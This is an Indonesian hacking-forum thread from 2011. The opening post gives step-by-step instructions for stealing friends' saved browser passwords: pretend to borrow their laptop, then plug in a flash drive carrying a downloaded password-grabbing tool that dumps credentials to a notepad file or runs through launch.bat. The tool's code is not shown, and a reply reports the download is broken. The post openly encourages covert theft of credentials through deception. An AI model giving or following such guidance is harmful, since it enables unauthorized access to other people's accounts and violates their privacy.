=_= INDONESIA =_=
Welcome FORUM KITA BERSAMA

Disini kita dapat mencari bermacam-macam kebutuhan sehari-hari dan dapat meningkatkan kerjasama, pengalaman, dan ilmu.

segeralah login apabila anda sudah bergabung, dan klik registrasi apabila anda belum bergabung


terimakasih

http://www.risman-efendi.blogspot.com/


FORUM KITA BERSAMA
 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Curi Password Teman Menggunakan Flash Disk

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
_F.K.B_RISMAN_
ADMIN
ADMIN
avatar

Jumlah posting : 93
Points : 282
Join date : 19.12.10
Age : 22
Lokasi : Perawang - Riau

PostSubyek: Curi Password Teman Menggunakan Flash Disk   Fri Jan 14, 2011 12:48 am

ni gw share dikit buat tmn2 cara curi password sum lewat flashdisk....
cara kerja soft ini yaitu mengambil user, email, dan password yang tersimpan didalam browser yang pernah dipakai penggunanya...
naahh,,,bagaimna bisa email n password tersimpan kedlm browser yg dipakai???
bgini,,,disini
kita memanfaatkan keteledoran user,,,dimana biasanya ketika teman
memasukkan email n passwordnya, akan muncul jendela pop-up (dibawah tab
browser)...ada 3 pilihan di jendela pop-up ini, yaitu "remember me",
"never for this site (kykx tulisanx gitu...)", "not now"... ketika
teman mengklik "remember me" maka otomatis email,user name, n
passwordnya akan tersimpan kedalam cache browser yang dipakai....maka
dari itu gw tulis judulnya "Curi Password Teman" karena jika teman
memakai komputer or laptop pribadi, biasanya dia langsung mengklik
"remember me",,,agar ga repot lagi masukin user n password lagi....
kan
gampang tuh,,,tinggal pura2 aja pinjam laptopnya ( iseng2 lah mo copy
data or tugas) colokin deh flashdisk u yang dah dipasang soft
pencurinya....wakakakaa....
bukan ngajarin mencuri yaahhh.....wakakaaa...

lansung aja neh carax....

1.DOWNLOAD
2. extrak filenya ke flashdiskmu...
3. tinggal colokin deh ke komputer or laptop teman...
otomatis akan ada file notepad yang muncul,,,nah disitulah letak passwordnya....
klo ga jalan otomatis, tinggal klik 2x aja file launch.bat
Kembali Ke Atas Go down
Lihat profil user http://merah-putih.forumid.net
minato25
TRAINEE
TRAINEE


Jumlah posting : 1
Points : 1
Join date : 21.03.12

PostSubyek: Re: Curi Password Teman Menggunakan Flash Disk   Wed Mar 21, 2012 2:52 am

ngga bisa di download gan...
tlong penjelasanya..
Kembali Ke Atas Go down
Lihat profil user
 
Curi Password Teman Menggunakan Flash Disk
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» [share] Caraku terhindar 100% dari Virus PC & Notebook ( No Deep Freeze )
» Ask: kok abis ganti kampas rem, disk break malah kemakan y?
» Disk brake full floating & tanya master rem R1
» WTS: JAM TANGAN LED TOKYO FLASH ORI 100% MURAHHH!!!
» (ASK) disk koso depan Lebih ngegigit Dari disk stdnya?

Permissions in this forum:Anda tidak dapat menjawab topik
=_= INDONESIA =_= :: HACKING / CRACKING-
Navigasi: